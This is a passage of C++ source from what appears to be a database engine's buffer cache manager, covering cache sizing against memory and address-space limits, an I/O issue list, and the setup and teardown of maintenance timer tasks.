Expected( bfrsOld != bfrsNotCommitted || ( pbf->fQuiesced || pbf->fAvailable ) );
if ( pbf->bfat == bfatFracCommit )
{
OnDebug( const LONG_PTR cbCacheCommittedSizeInitial = (LONG_PTR)) AtomicExchangeAddPointer( (void**)&g_cbCacheCommittedSize, (void*)( -( (LONG_PTR)g_rgcbPageSize[pbf->icbBuffer] ) ) );
Assert( cbCacheCommittedSizeInitial >= g_rgcbPageSize[pbf->icbBuffer] );
}
pbf->fNewlyEvicted = fFalse;
// clear this BF's page pointer / alloc type
pbf->pv = NULL;
pbf->bfat = bfatNone;
Assert( FBFIValidPvAllocType( pbf ) );
}
// shrink our status storage iff we are terminating the cache
if ( 0 == cbfCacheAddressableNew )
{
// terminate all initialized BFs
const LONG_PTR cbfTerm = cbfInit;
for ( LONG_PTR ibfTerm = cbfTerm - 1; ibfTerm >= 0; ibfTerm-- )
{
PBF pbf = PbfBFICacheIbf( ibfTerm );
// mark this BF as terminated
cbfInit = ibfTerm;
// we think this will always hold b/c if we're about to release this
// buffer then it should be available (i.e. freed from using data)
// or quiesced (i.e. in the shrunk-quiesced state). there may be
// another state we're missing
Expected( pbf->fQuiesced || pbf->fAvailable );
// explicitly destruct this BF
if ( pbf->fQuiesced || pbf->fAvailable )
{
pbf->sxwl.ClaimOwnership( bfltWrite );
pbf->sxwl.ReleaseWriteLatch();
}
pbf->~BF();
}
// shrink our status storage
CallS( ErrBFICacheISetStatusSize( cbfTerm, 0 ) );
}
}
HandleError:
return err;
}
LOCAL BOOL FBFICacheSizeFixed()
{
return ( UlParam( JET_paramCacheSizeMin ) == UlParam( JET_paramCacheSizeMax ) ||
g_cbfCacheUserOverride != 0 );
}
LOCAL BOOL FBFICacheApproximatelyEqual( const ULONG_PTR cbfTarget, const ULONG_PTR cbfCurrent )
{
if ( cbfCurrent > 0 )
{
// Only one buffer is considered acceptable.
if ( absdiff( cbfTarget, cbfCurrent ) == 1 )
{
return fTrue;
}
// Calculate the fraction.
const double fracCbfCache = (double)absdiff( cbfTarget, cbfCurrent ) / (double)cbfCurrent;
if ( fracCbfCache <= fracMaintCacheSensitivity )
{
return fTrue;
}
return fFalse;
}
else
{
return ( cbfTarget == cbfCurrent );
}
}
#ifdef ENABLE_JET_UNIT_TEST
JETUNITTEST( BF, TestCbfSameWithinSensitivity )
{
const ULONG_PTR cbfCurrent = 1000;
const ULONG_PTR dcbfWithinRange = (ULONG_PTR)( cbfCurrent * fracMaintCacheSensitivity );
const ULONG_PTR cbfCurrentSmall = 10;
const ULONG_PTR dcbfWithinRangeSmall = (ULONG_PTR)( cbfCurrentSmall * fracMaintCacheSensitivity );
const ULONG_PTR dcbfOutsideRangeSmall = 1;
// Self-checks.
CHECK( dcbfWithinRange < cbfCurrent );
CHECK( cbfCurrent != 0 );
CHECK( dcbfWithinRange != 0 );
CHECK( dcbfWithinRangeSmall < cbfCurrentSmall );
CHECK( dcbfOutsideRangeSmall < cbfCurrentSmall );
CHECK( dcbfWithinRangeSmall < dcbfOutsideRangeSmall );
CHECK( cbfCurrentSmall != 0 );
CHECK( dcbfOutsideRangeSmall != 0 );
// Zeroed current.
CHECK( FBFICacheApproximatelyEqual( 0, 0 ) );
CHECK( !FBFICacheApproximatelyEqual( 1, 0 ) );
CHECK( !FBFICacheApproximatelyEqual( 1000, 0 ) );
// Small current.
CHECK( FBFICacheApproximatelyEqual( cbfCurrentSmall, cbfCurrentSmall ) );
CHECK( FBFICacheApproximatelyEqual( cbfCurrentSmall - dcbfWithinRangeSmall, cbfCurrentSmall ) );
CHECK( FBFICacheApproximatelyEqual( cbfCurrentSmall + dcbfWithinRangeSmall, cbfCurrentSmall ) );
CHECK( FBFICacheApproximatelyEqual( cbfCurrentSmall - dcbfOutsideRangeSmall, cbfCurrentSmall ) );
CHECK( FBFICacheApproximatelyEqual( cbfCurrentSmall + dcbfOutsideRangeSmall, cbfCurrentSmall ) );
CHECK( !FBFICacheApproximatelyEqual( cbfCurrentSmall - dcbfOutsideRangeSmall - 1, cbfCurrentSmall ) );
CHECK( !FBFICacheApproximatelyEqual( cbfCurrentSmall + dcbfOutsideRangeSmall + 1, cbfCurrentSmall ) );
// Normal.
CHECK( FBFICacheApproximatelyEqual( cbfCurrent, cbfCurrent ) );
CHECK( FBFICacheApproximatelyEqual( cbfCurrent - dcbfWithinRange, cbfCurrent ) );
CHECK( FBFICacheApproximatelyEqual( cbfCurrent + dcbfWithinRange, cbfCurrent ) );
CHECK( !FBFICacheApproximatelyEqual( cbfCurrent - dcbfWithinRange - 1, cbfCurrent ) );
CHECK( !FBFICacheApproximatelyEqual( cbfCurrent + dcbfWithinRange + 1, cbfCurrent ) );
}
#endif // ENABLE_JET_UNIT_TEST
///////////////////////////////////////
// Cache Resource Allocation Manager
CCacheRAM g_cacheram;
inline CCacheRAM::CCacheRAM()
: CDBAResourceAllocationManager< cMaintCacheSamplesAvg >()
{
Reset();
}
inline CCacheRAM::~CCacheRAM()
{
}
inline void CCacheRAM::Reset()
{
m_cpgReclaimCurr = 0;
m_cpgReclaimLast = 0;
m_cpgReclaimNorm = 0;
m_cpgEvictCurr = 0;
m_cpgEvictLast = 0;
m_cpgEvictNorm = 0;
m_cpgPhysicalMemoryEvictedLast = 0;
m_cbTotalPhysicalMemoryEvicted = 0;
m_cbTotalResourcesEvictedLast = 0;
m_cbTotalResourcesEvicted = 0;
m_cbfCacheNewDiscrete = 0;
m_cbOptimalResourcePoolSizeUsedLast = 0;
m_dcbAdjustmentOverride = 0;
}
inline size_t CCacheRAM::TotalPhysicalMemory()
{
// return the amount of physical memory, taking quotas into account
return OSMemoryQuotaTotal();
}
inline size_t CCacheRAM::AvailablePhysicalMemory()
{
// return the amount of available physical memory, taking quotas into
// account
const QWORD cbAvail = OSMemoryAvailable();
const size_t cbTotal = OSMemoryQuotaTotal();
const QWORD cbPool = this->TotalResources();
size_t cbTemp = cbTotal > cbPool ? (size_t)( cbTotal - cbPool ) : 0;
Assert( min( cbAvail, (QWORD)cbTemp ) == (size_t)min( cbAvail, cbTemp ) );
return (size_t)min( cbAvail, cbTemp );
}
inline size_t CCacheRAM::TotalPhysicalMemoryEvicted()
{
const size_t cbQuotaTotal = OSMemoryQuotaTotal();
const QWORD cbTotal = OSMemoryTotal();
// scale our page reclaim count up to approximate what the page reclaim
// count should be for the system, taking quotas into account
const double fracCache = (double)CbBFICacheBufferSize() / (double)cbQuotaTotal;
m_cpgReclaimCurr = g_cpgReclaim;
m_cpgReclaimNorm += (DWORD)( ( m_cpgReclaimCurr - m_cpgReclaimLast ) / fracCache + 0.5 );
m_cpgReclaimLast = m_cpgReclaimCurr;
// scale the OS eviction count to take quotas into account
//
// NOTE: one can set quotas such that different pools end up having
// different memory priorities. for example, a pool in a process with a
// max size of 128MB will shrink twice as fast as a pool in a process with
// a max size of 64MB
const double fracQuota = (double)cbQuotaTotal / (double)cbTotal;
m_cpgEvictCurr = OSMemoryPageEvictionCount();
m_cpgEvictNorm += (DWORD)( ( m_cpgEvictCurr - m_cpgEvictLast ) * fracQuota + 0.5 );
m_cpgEvictLast = m_cpgEvictCurr;
// the page eviction count is the sum of the OS eviction count and the
// page reclaim count which we approximate above
const DWORD cpgPhysicalMemoryEvicted = m_cpgEvictNorm + m_cpgReclaimNorm;
m_cbTotalPhysicalMemoryEvicted += ( cpgPhysicalMemoryEvicted - m_cpgPhysicalMemoryEvictedLast ) * (size_t)OSMemoryPageCommitGranularity();
m_cpgPhysicalMemoryEvictedLast = cpgPhysicalMemoryEvicted;
return m_cbTotalPhysicalMemoryEvicted;
}
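// Illustrative example (hypothetical numbers): if the cache occupies 25% of the memory
// quota ( fracCache == 0.25 ), 100 reclaims observed against our buffers scale up to
// roughly 100 / 0.25 == 400 reclaims system wide; conversely, with a quota of half of
// physical memory ( fracQuota == 0.5 ), only half of the OS eviction count is charged
// against this pool.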
inline QWORD CCacheRAM::TotalResources()
{
return (QWORD)CbBFICacheBufferSize();
}
inline QWORD CCacheRAM::TotalResourcesEvicted()
{
const DWORD cbTotalResourcesEvicted = g_cbNewlyEvictedUsed;
m_cbTotalResourcesEvicted += ( cbTotalResourcesEvicted - m_cbTotalResourcesEvictedLast );
m_cbTotalResourcesEvictedLast = cbTotalResourcesEvicted;
return m_cbTotalResourcesEvicted;
}
QWORD CbBFIMaintCacheSizeIAdjust_( const QWORD cbCurrent, const double cbDelta )
{
if ( cbDelta < 0.0 && (QWORD)-cbDelta > cbCurrent )
{
return 0;
}
else if ( cbDelta > 0.0 && (QWORD)cbDelta > ( qwMax - cbCurrent ) )
{
return qwMax;
}
else
{
return ( cbDelta > 0.0 ? cbCurrent + (QWORD)cbDelta : cbCurrent - (QWORD)-cbDelta );
}
}
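// Illustrative example: CbBFIMaintCacheSizeIAdjust_( 100, -150.0 ) saturates to 0 rather than
// wrapping, CbBFIMaintCacheSizeIAdjust_( qwMax - 10, 100.0 ) saturates to qwMax, and otherwise
// the (truncated) delta is simply added to or subtracted from the current size.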
inline QWORD CCacheRAM::GetOptimalResourcePoolSize()
{
return m_cbOptimalResourcePoolSizeUsedLast;
}
void CCacheRAM::UpdateStatistics()
{
Assert( g_critCacheSizeSetTarget.FOwner() );
__super::UpdateStatistics();
}
void CCacheRAM::ConsumeResourceAdjustments( __out double * const pdcbTotalResource, __in const double cbResourceSize )
{
Assert( g_critCacheSizeSetTarget.FOwner() );
if ( m_dcbAdjustmentOverride != 0 )
{
const __int64 dcbAdjustmentOverride = (__int64)m_dcbAdjustmentOverride;
*pdcbTotalResource = (double)roundup( dcbAdjustmentOverride, (__int64)cbResourceSize );
m_dcbAdjustmentOverride = 0;
}
else
{
__super::ConsumeResourceAdjustments( pdcbTotalResource, cbResourceSize );
}
}
void CCacheRAM::OverrideResourceAdjustments( double const dcbResource )
{
Assert( g_critCacheSizeSetTarget.FOwner() );
m_dcbAdjustmentOverride = dcbResource;
}
inline void CCacheRAM::SetOptimalResourcePoolSize()
{
Assert( g_critCacheSizeSetTarget.FOwner() );
// retrieve adjustment to current pool size from DBA / resmgr
double dcbTotalResource = 0.0;
g_cacheram.ConsumeResourceAdjustments( &dcbTotalResource, (double)g_rgcbPageSize[g_icbCacheMax] );
// compute the optimal amount of memory that this resource pool should have
QWORD cbOptimalResources = CbBFIMaintCacheSizeIAdjust_( m_cbOptimalResourcePoolSizeUsedLast, dcbTotalResource );
cbOptimalResources = min( cbOptimalResources, OSMemoryQuotaTotal() );
cbOptimalResources = max( cbOptimalResources, (QWORD)( cbfCacheMinMin * g_rgcbPageSize[g_icbCacheMax] ) );
Assert( cbOptimalResources > 0 );
// the optimal resource pool size will be the new cache size
LONG_PTR cbfCacheNew = (LONG_PTR)( cbOptimalResources / g_rgcbPageSize[g_icbCacheMax] );
Enforce( cbfCacheNew >= 0 );
// if the cache size is being controlled externally then override the RAM
cbfCacheNew = g_cbfCacheUserOverride ? g_cbfCacheUserOverride : cbfCacheNew;
// limit the new cache size to the preferred operating range of cache sizes
const ULONG_PTR cbfCacheSizeMin = UlParam( JET_paramCacheSizeMin );
const ULONG_PTR cbfCacheSizeMax = UlParam( JET_paramCacheSizeMax );
cbfCacheNew = UlpBound( (ULONG_PTR)cbfCacheNew, (ULONG_PTR)cbfCacheSizeMin, (ULONG_PTR)cbfCacheSizeMax );
Enforce( cbfCacheNew > 0 );
// this is the value we want to snapshot to utilize on the next optimal pool size calculation
m_cbOptimalResourcePoolSizeUsedLast = (QWORD)cbfCacheNew * (QWORD)g_rgcbPageSize[g_icbCacheMax];
// buffer credit we are entitled to since the buffer manager is saving memory due to dehydrations
const LONG_PTR cbfCredit = CbfBFICredit();
g_avgCbfCredit.AddSample( cbfCredit );
cbfCacheNew += CbfBFIAveCredit();
Enforce( cbfCacheNew > 0 );
// we will discretize the suggested cache size to avoid too many small growths and shrinkages
// around the same value, once we reach a steady state.
// we will apply hysteresis to this behavior, to avoid growing/shrinking very rapidly around the
// same value.
// this will only be done for an active DBA. fixed cache size configurations will quiesce using
// the same sensitivity, so the effect will be similar when deciding to wake up.
if ( !FBFICacheSizeFixed() )
{
if ( !FBFICacheApproximatelyEqual( (ULONG_PTR)cbfCacheNew, (ULONG_PTR)m_cbfCacheNewDiscrete ) )
{
// we've migrated outside of the dehydration granularity / sensitivity
// accept and save the new cache size
m_cbfCacheNewDiscrete = cbfCacheNew;
}
else
{
// keep the same cache size
cbfCacheNew = m_cbfCacheNewDiscrete;
}
Enforce( m_cbfCacheNewDiscrete > 0 );
Enforce( cbfCacheNew > 0 );
}
// Limit how much cache memory we can use by the amount of virtual address
// space left in our process. we do this so that we do not starve other
// consumers of virtual address space on machines with more physical
// memory than can be mapped in the current process
//
// In 32-bit, limit the cache size to half of VA to avoid VA exhaustion due
// to memory fragmentation caused by shrink
//
// Another consumer of VA is memory-mapped I/O. The OS's minimum VA
// granularity for mapping files is 64k. Even when we only care about a single page in
// that 64k region the entire 64k is mapped. Then when another page is desired,
// we don't currently reuse that 64k region, but map an entirely new section. This
// can explode the Commit Charge (it's worse for smaller pages), but the Private
// Bytes are only the ones that are touched (the untouched COW pages aren't Private).
//
// The implications of this are:
//
// - other consumers of VA can push us out of memory and there is no way
// for us to push back because VA is not "paged" by the system
// - multiple DBAs that do this cannot co-exist in the same process
// because they will not converge or balance their memory consumption
//
// NOTE: this is only a factor on systems with limited VA
const size_t cbVATotal = size_t( OSMemoryPageReserveTotal() * fracVAMax );
const size_t iViewCacheDilutionFactor = BoolParam( JET_paramEnableViewCache ) ? OSMemoryPageReserveGranularity() / g_rgcbPageSize[g_icbCacheMax] : 1;
Enforce( iViewCacheDilutionFactor >= 1 );
Enforce( iViewCacheDilutionFactor <= 32 ); // Assuming 64k VA granularity, 2k pages would give the worst (largest) factor.
const size_t cbVAAvailMin = size_t( cbVATotal * fracVAAvailMin );
const size_t cbVAAvail = OSMemoryPageReserveAvailable();
const size_t cbVACache = ( ( cbfCacheAddressable + g_cpgChunk - 1 ) / g_cpgChunk ) * g_cpgChunk * g_rgcbPageSize[g_icbCacheMax];
const size_t cbVACacheMax = ( min( cbVATotal, max( cbVAAvailMin, cbVACache + cbVAAvail ) ) - cbVAAvailMin ) / iViewCacheDilutionFactor;
const size_t cbfVACacheMax = ( cbVACacheMax / g_rgcbPageSize[g_icbCacheMax] / g_cpgChunk ) * g_cpgChunk;
cbfCacheNew = min( (size_t)cbfCacheNew, cbfVACacheMax );
cbfCacheNew = max( cbfCacheNew, 1 ); // do not let it fall to 0
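// Illustrative example (hypothetical numbers): in a VA-limited 32-bit process with 2 GB of
// reservable VA and fracVAMax == 0.5, cbVATotal == 1 GB; if the cache already reserves 256 MB
// and 512 MB of VA is still available, cbVACacheMax caps the cache at roughly
// ( 256 MB + 512 MB ) - cbVAAvailMin, rounded down to whole chunks, regardless of how much
// physical memory the DBA would otherwise grant.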
Enforce( cbfCacheNew > 0 );
// store the theoretical optimal cache size
g_cbfCacheTargetOptimal = cbfCacheNew;
BFIMaintAvailPoolUpdateThresholds( g_cbfCacheTargetOptimal );
// if the new cache size is below the deadlock threshold then force it to
// be large enough to avoid the deadlock
cbfCacheNew = UlpFunctionalMax( cbfCacheNew, cbfCacheDeadlock );
Enforce( cbfCacheNew > 0 );
// do not allow the cache size to exceed the physical limits of the cache / i.e. it
// can't be more than what we can manage
cbfCacheNew = min( (ULONG_PTR)cbfCacheNew, (ULONG_PTR)cCacheChunkMax * (ULONG_PTR)min( g_cbfChunk, g_cpgChunk ) );
Enforce( cbfCacheNew > 0 );
// do not allow the cache size to be below 2 unless we are terming because that
// causes problems with our avail pool thresholds
if ( cbfCacheNew < cbfCacheMinMin )
{
cbfCacheNew = cbfCacheMinMin;
}
Enforce( cbfCacheNew >= cbfCacheMinMin );
// set new cache size target
BFICacheISetTarget( cbfCacheNew );
}
///////////////
// Issue List
CBFIssueList::
CBFIssueList()
: m_pbfilPrev( Ptls()->pbfil ),
m_group( CMeteredSection::groupInvalidNil )
{
Ptls()->pbfil = this;
// this is very questionable ... it expects the issue list to be on the stack, and stacks "grow" down
Expected( m_pbfilPrev > this || m_pbfilPrev == NULL );
}
CBFIssueList::
~CBFIssueList()
{
Assert( FEmpty() );
// just in case, we're not going to leak memory
while ( CEntry* pentry = m_il.PrevMost() )
{
m_il.Remove( pentry );
delete pentry;
}
if ( m_group >= 0 )
{
s_msSync.Leave( m_group );
}
Assert( Ptls()->pbfil == this );
Ptls()->pbfil = m_pbfilPrev;
}
ERR CBFIssueList::
ErrPrepareWrite( const IFMP ifmp )
{
return ErrPrepareOper( ifmp, CEntry::operWrite );
}
ERR CBFIssueList::
ErrPrepareLogWrite( const IFMP ifmp )
{
return ErrPrepareOper( ifmp, CEntry::operLogWrite );
}
ERR CBFIssueList::
ErrPrepareRBSWrite( const IFMP ifmp )
{
return ErrPrepareOper( ifmp, CEntry::operRBSWrite );
}
ERR CBFIssueList::
ErrIssue( const BOOL fSync )
{
ERR err = JET_errSuccess;
CEntry* pentry = NULL;
while ( pentry = m_il.PrevMost() )
{
switch ( pentry->Oper() )
{
case CEntry::operWrite:
Call( g_rgfmp[ pentry->Ifmp() ].Pfapi()->ErrIOIssue() );
break;
case CEntry::operLogWrite:
(void)ErrBFIWriteLog( pentry->Ifmp(), fSync );
break;
case CEntry::operRBSWrite:
// We can ignore error because ErrBFIPrepareFlushPage() double checks the next time
// we try to flush a page
Assert( g_rgfmp[ pentry->Ifmp() ].FRBSOn() );
(void)g_rgfmp[ pentry->Ifmp() ].PRBS()->ErrFlushAll();
break;
default:
AssertSz( fFalse, "Unknown CBFIssueList pentry->Oper() = %d, unissued!\n", pentry->Oper() );
}
m_il.Remove( pentry );
delete pentry;
}
if ( m_group >= 0 )
{
s_msSync.Leave( m_group );
m_group = CMeteredSection::groupInvalidNil;
}
Assert( FEmpty() );
// pass back a warning wrnBFINothingToFlush?
HandleError:
return err;
}
VOID CBFIssueList::
AbandonLogOps()
{
CEntry* pentry = NULL;
while ( pentry = m_il.PrevMost() )
{
switch ( pentry->Oper() )
{
// We will not hit CEntry::operWrite here as this function is only called by ErrBFIFlushPage while fOpportune is false.
// So no opportunistic writes will happen. Ref to ErrBFIFlushPage and ErrBFIPrepareFlushPage code for more detail.
case CEntry::operLogWrite:
case CEntry::operRBSWrite:
break;
default:
AssertSz( fFalse, "Unexpected CBFIssueList pentry->Oper() = %d, unissued!\n", pentry->Oper() );
}
m_il.Remove( pentry );
delete pentry;
}
if ( m_group >= 0 )
{
s_msSync.Leave( m_group );
m_group = CMeteredSection::groupInvalidNil;
}
Expected( FEmpty() );
}
ERR CBFIssueList::
ErrSync()
{
#ifdef DEBUG
CBFIssueList * pbfil = Ptls()->pbfil;
while( pbfil )
{
Assert( pbfil->FEmpty() );
Assert( pbfil->m_group == CMeteredSection::groupInvalidNil );
pbfil = pbfil->m_pbfilPrev;
}
#endif
s_critSync.Enter();
s_msSync.Partition();
s_critSync.Leave();
return JET_errSuccess;
}
ERR CBFIssueList::
ErrPrepareOper( const IFMP ifmp, const CEntry::eOper oper )
{
ERR err = JET_errSuccess;
CEntry* pentry = NULL;
CEntry* pentryNew = NULL;
if ( m_group < 0 )
{
m_group = s_msSync.Enter();
}
for ( pentry = m_il.PrevMost(); pentry; pentry = m_il.Next( pentry ) )
{
if ( pentry->Ifmp() == ifmp && pentry->Oper() == oper )
{
pentry->IncRequests();
Error( JET_errSuccess );
}
}
Alloc( pentryNew = new CEntry( ifmp, oper ) );
m_il.InsertAsNextMost( pentryNew );
pentryNew = NULL;
HandleError:
delete pentryNew;
return err;
}
BOOL CBFIssueList::FEmpty() const
{
return m_il.PrevMost() == NULL;
}
VOID CBFIssueList::NullifyDiskTiltFake( const IFMP ifmp )
{
CEntry * pentry = m_il.PrevMost();
if ( pentry )
{
// if there is only one oper, it's a write oper for this IFMP, and we've only had
// one request, then we can assume it's the fake write oper added for the disk tilt. This
// is admittedly a fragile way to detect it.
if ( m_il.Next( pentry ) == NULL &&
pentry->Oper() == CEntry::operWrite &&
pentry->Ifmp() == ifmp &&
pentry->CRequests() == 1 )
{
AssertRTL( PefLastThrow() && PefLastThrow()->Err() == errDiskTilt );
Assert( pentry == m_il.PrevMost() ); // should be no concurrency concerns
m_il.Remove( pentry );
delete pentry;
Assert( FEmpty() ); // our issue list should now be empty.
// let the .dtor take care of the partition
}
else
{
AssertSz( fFalse, "Client shouldn't be calling with these args / state" );
}
}
}
CCriticalSection CBFIssueList::s_critSync( CLockBasicInfo( CSyncBasicInfo( _T( "CBFIssueList::s_critSync" ) ), rankBFIssueListSync, 0 ) );
CMeteredSection CBFIssueList::s_msSync;
////////////////
// Maintenance
// The two variables below are set when g_semMaintCacheSize is acquired (i.e., cache sizing officially starts) and reset
// when g_semMaintCacheSize is released. g_semMaintCacheSize is held all the way through until the cache resizing achieves
// its aim (which may be several reschedulings of the shrink task). g_tickMaintCacheSizeStartedLast is used to calculate
// cache sizing duration (for perf. counters and also shrink aggressiveness), while g_cbfMaintCacheSizeStartedLast is used
// only to calculate shrink aggressiveness. Note that because they are consumed without a lock, g_tickMaintCacheSizeStartedLast
// is set to the current time when cache sizing ends so that if we evaluate them during the transition, we don't incur the
// risk of computing a very large shrink urgency (due to unreasonably high shrink duration).
LOCAL volatile TICK g_tickMaintCacheSizeStartedLast = 0; // last time cache sizing started
LOCAL volatile LONG_PTR g_cbfMaintCacheSizeStartedLast = cbfMainCacheSizeStartedLastInactive; // cache size at the time the last cache sizing started
LOCAL TICK g_tickLastMaintCacheStats = 0; // last time a cache statistics maintenance task was executed
LOCAL TICK g_tickLastCacheStatsRequest = 0; // last time a cache statistics maintenance task was requested
LOCAL TICK g_tickLastMaintCacheSize = 0; // last time a cache size maintenance task was executed
HMEMORY_NOTIFICATION g_pMemoryNotification = NULL;
// Init / Term
LOCAL CBinaryLock g_blBFMaintScheduleCancel( CLockBasicInfo( CSyncBasicInfo( _T( "BFMaint Schedule/Cancel" ) ), rankBFMaintScheduleCancel, 0 ) );
LOCAL volatile BOOL g_fBFMaintInitialized = fFalse;
ERR ErrBFIMaintInit()
{
ERR err = JET_errSuccess;
Assert( !g_fBFMaintInitialized );
// Initialize task time tracking variables
g_tickLastCacheStatsRequest = TickOSTimeCurrent();
// Init scavenging and avail pool maintenance
cbfCacheDeadlock = 0;
g_cbfCacheDeadlockMax = 0;
Call( ErrBFIMaintScavengeInit() );
// Allocate timer tasks first, since timers can reschedule each other
Call( ErrOSTimerTaskCreate( BFIMaintIdleDatabaseITask, /* global key */ &ErrBFIMaintInit, &g_posttBFIMaintIdleDatabaseITask ) );
Call( ErrOSTimerTaskCreate( BFIMaintCacheResidencyITask, /* global key */ &ErrBFIMaintInit, &g_posttBFIMaintCacheResidencyITask ) );
Call( ErrOSTimerTaskCreate( BFIMaintIdleCacheStatsITask, /* global key */ &ErrBFIMaintInit, &g_posttBFIMaintIdleCacheStatsITask ) );
Call( ErrOSTimerTaskCreate( BFIMaintCacheStatsITask, /* global key */ &ErrBFIMaintInit, &g_posttBFIMaintCacheStatsITask ) );
Call( ErrOSTimerTaskCreate( BFIMaintTelemetryITask, /* global key */ &ErrBFIMaintInit, &g_posttBFIMaintTelemetryITask ) );
Call( ErrOSTimerTaskCreate( BFIMaintCacheSizeITask, /* global key */ &ErrBFIMaintInit, &g_posttBFIMaintCacheSizeITask ) );
Call( ErrOSTimerTaskCreate( BFIMaintCheckpointITask, /* global key */ &ErrBFIMaintInit, &g_posttBFIMaintCheckpointITask ) );
Call( ErrOSTimerTaskCreate( BFIMaintCheckpointDepthITask, /* global key */ &ErrBFIMaintInit, &g_posttBFIMaintCheckpointDepthITask ) );
Call( ErrOSTimerTaskCreate( BFIMaintAvailPoolIUrgentTask, /* global key */ &ErrBFIMaintInit, &g_posttBFIMaintAvailPoolIUrgentTask ) );
Call( ErrOSTimerTaskCreate( BFIMaintAvailPoolITask, /* global key */ &ErrBFIMaintInit, &g_posttBFIMaintAvailPoolITask ) );
Call( ErrOSCreateLowMemoryNotification(
BFIMaintLowMemoryCallback,
NULL,
&g_pMemoryNotification ) );
g_semMaintAvailPoolRequestUrgent.Release();
g_semMaintAvailPoolRequest.Release();
g_semMaintScavenge.Release();
// init checkpoint depth maintenance
g_ifmpMaintCheckpointDepthStart = 0;
g_semMaintCheckpointDepthRequest.Release();
// init checkpoint maintenance
g_tickMaintCheckpointLast = TickOSTimeCurrent();
g_semMaintCheckpointRequest.Release();
// init cache size maintenance
g_tickLastMaintCacheStats = TickOSTimeCurrent() - dtickMaintCacheStatsTooOld;
BFIMaintCacheStatsRelease();
g_tickMaintCacheSizeStartedLast = TickOSTimeCurrent();
g_cbfMaintCacheSizeStartedLast = cbfMainCacheSizeStartedLastInactive;
g_cMaintCacheSizePending = 0;
Assert( g_semMaintCacheSize.CAvail() == 0 );
g_semMaintCacheSize.Release();
BFIMaintCacheResidencyInit();
// init idle database maintenance
g_tickMaintIdleDatabaseLast = TickOSTimeCurrent();
g_semMaintIdleDatabaseRequest.Release();
// WARNING: any tasks kicked off by this function must be scheduled after the setting
// of the flag below, otherwise they will fail to be scheduled
g_fBFMaintInitialized = fTrue;
// WARNING: can't fail from this point forward because this component is considered initialized.
CallS( ErrBFIMaintCacheStatsRequest( bfmcsrtForce ) ); // OSTimerTask tasks never fail scheduling besides when the task quiescing
// signals are set (which isn't the case here).
// start telemetry maintenance
BFIMaintTelemetryRequest();
#if 0 // Hashed latches are permanently disabled.
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
// init hashed latch maintenance
g_fBFMaintHashedLatches = fFalse;
#ifdef DEBUG
const INT cMinProcsForHashedLatches = 1;
#else
const INT cMinProcsForHashedLatches = 2;
#endif
#pragma prefast( suppress:6237, "The rest of the conditions do not have any side effects." )
if ( fFalse && // disable this maintenance task permanently
!FJetConfigLowMemory() &&
!FJetConfigMedMemory() &&
!FJetConfigLowPower() &&
OSSyncGetProcessorCountMax() >= cMinProcsForHashedLatches )
{
g_fBFMaintHashedLatches = fTrue;
Call( ErrBFIMaintScheduleTask( BFIMaintHashedLatchesITask,
NULL,
dtickMaintHashedLatchesPeriod,
dtickMaintHashedLatchesPeriod ) );
}
#endif // MINIMAL_FUNCTIONALITY
#endif // 0
HandleError:
if ( err < JET_errSuccess )
{
Assert( !g_fBFMaintInitialized );
BFIMaintTerm();
}
else
{
Assert( g_fBFMaintInitialized );
}
return err;
}
void BFIMaintTerm()
{
// only allow task cancelation during term
g_blBFMaintScheduleCancel.Enter2();
// term idle database maintenance
if ( g_posttBFIMaintIdleDatabaseITask )
{
OSTimerTaskCancelTask( g_posttBFIMaintIdleDatabaseITask );
}
(void)g_semMaintIdleDatabaseRequest.FTryAcquire();
// term cache size maintenance
BFIMaintCacheResidencyTerm();
if ( g_posttBFIMaintIdleCacheStatsITask )
{
OSTimerTaskCancelTask( g_posttBFIMaintIdleCacheStatsITask );
}
if ( g_posttBFIMaintCacheStatsITask )
{
OSTimerTaskCancelTask( g_posttBFIMaintCacheStatsITask );
}
if ( g_posttBFIMaintTelemetryITask )
{
OSTimerTaskCancelTask( g_posttBFIMaintTelemetryITask );
}
// delete memory notification after cache stats since cache stats can
// use memory notification while quiescing itself
if ( g_pMemoryNotification != NULL )
{
OSUnregisterAndDestroyMemoryNotification( g_pMemoryNotification );
g_pMemoryNotification = NULL;
}
Assert( g_semMaintCacheSize.CAvail() <= 1 );
if ( g_posttBFIMaintCacheSizeITask )
{
OSTimerTaskCancelTask( g_posttBFIMaintCacheSizeITask );
}
Assert( g_semMaintCacheSize.CAvail() <= 1 );
(void)FBFIMaintCacheStatsTryAcquire();
Assert( g_semMaintCacheSize.CAvail() <= 1 );
(void)g_semMaintCacheSize.FTryAcquire();
Assert( g_semMaintCacheSize.CAvail() == 0 );
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
#if 0 // Hashed latches are permanently disabled.
// term hashed latch maintenance
(void)ErrBFIMaintCancelTask( BFIMaintHashedLatchesITask );
g_fBFMaintHashedLatches = fFalse;
#endif // 0
#endif // MINIMAL_FUNCTIONALITY
// term checkpoint maintenance
if ( g_posttBFIMaintCheckpointITask )
{
OSTimerTaskCancelTask( g_posttBFIMaintCheckpointITask );
}
(void)g_semMaintCheckpointRequest.FTryAcquire();
// term checkpoint depth maintenance
if ( g_posttBFIMaintCheckpointDepthITask )
{
OSTimerTaskCancelTask( g_posttBFIMaintCheckpointDepthITask );
}
(void)g_semMaintCheckpointDepthRequest.FTryAcquire();
// term scavenging and avail pool maintenance
if ( g_posttBFIMaintAvailPoolIUrgentTask )
{
OSTimerTaskCancelTask( g_posttBFIMaintAvailPoolIUrgentTask );
}
if ( g_posttBFIMaintAvailPoolITask )
{
OSTimerTaskCancelTask( g_posttBFIMaintAvailPoolITask );
}
(void)g_semMaintAvailPoolRequestUrgent.FTryAcquire();
(void)g_semMaintAvailPoolRequest.FTryAcquire();
(void)g_semMaintScavenge.FTryAcquire();
BFIMaintScavengeTerm();
// delete objects, which is done here in case there are cross-references
// between tasks, so the code above will quiesce them all and the code
// below will delete the objects
if ( g_posttBFIMaintIdleDatabaseITask )
{
OSTimerTaskDelete( g_posttBFIMaintIdleDatabaseITask );
g_posttBFIMaintIdleDatabaseITask = NULL;
}
if ( g_posttBFIMaintCacheResidencyITask )
{
OSTimerTaskDelete( g_posttBFIMaintCacheResidencyITask );
g_posttBFIMaintCacheResidencyITask = NULL;
}
if ( g_posttBFIMaintIdleCacheStatsITask )
{
OSTimerTaskDelete( g_posttBFIMaintIdleCacheStatsITask );
g_posttBFIMaintIdleCacheStatsITask = NULL;
}
if ( g_posttBFIMaintCacheStatsITask )
{
OSTimerTaskDelete( g_posttBFIMaintCacheStatsITask );
